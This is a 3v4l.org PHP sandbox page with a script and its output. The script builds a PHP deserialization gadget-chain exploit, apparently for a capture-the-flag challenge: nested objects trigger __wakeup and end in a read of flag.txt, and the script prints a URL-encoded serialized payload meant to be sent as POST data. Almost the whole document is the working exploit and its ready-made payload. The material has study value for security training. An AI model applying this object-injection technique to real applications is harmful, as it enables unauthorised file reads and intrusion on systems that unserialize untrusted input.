3v4l.org

run code in 500+ PHP versions simultaneously
<?php
class RitualEngine {
    protected $settings;
    public $target;
    public $callback;
}

class Keystone {
    public $center;
}

class GateSentinel {
    public $object;
    public $tool;
}

// 1. Innermost RitualEngine D: responsible for the final read of flag.txt
$D = new RitualEngine();
$D->target = 'flag.txt';
$D->callback = null; // not used

// 2. RitualEngine C: callback holds the serialized [D, 'view']
$C = new RitualEngine();
$C->callback = serialize([$D, 'view']);

// 3. Keystone K: center points to C
$K = new Keystone();
$K->center = $C;

// 4. GateSentinel B: object is arbitrary, tool['blade'] points to K
$B = new GateSentinel();
$B->object = 'nothing'; // does not contain flag, .., etc.
$B->tool = ['blade' => $K];

// 5. Outermost GateSentinel A: object points to B, triggers __wakeup
$A = new GateSentinel();
$A->object = $B;

// Generate the payload
$payload = serialize($A);
echo urlencode($payload); // the output can be used as the POST data parameter
?>
Output for 8.3.0 - 8.3.30, 8.4.1 - 8.4.18, 8.5.0 - 8.5.3
O%3A12%3A%22GateSentinel%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A12%3A%22GateSentinel%22%3A2%3A%7Bs%3A6%3A%22object%22%3Bs%3A7%3A%22nothing%22%3Bs%3A4%3A%22tool%22%3Ba%3A1%3A%7Bs%3A5%3A%22blade%22%3BO%3A8%3A%22Keystone%22%3A1%3A%7Bs%3A6%3A%22center%22%3BO%3A12%3A%22RitualEngine%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00settings%22%3BN%3Bs%3A6%3A%22target%22%3BN%3Bs%3A8%3A%22callback%22%3Bs%3A115%3A%22a%3A2%3A%7Bi%3A0%3BO%3A12%3A%22RitualEngine%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00settings%22%3BN%3Bs%3A6%3A%22target%22%3Bs%3A8%3A%22flag.txt%22%3Bs%3A8%3A%22callback%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22view%22%3B%7D%22%3B%7D%7D%7D%7Ds%3A4%3A%22tool%22%3BN%3B%7D
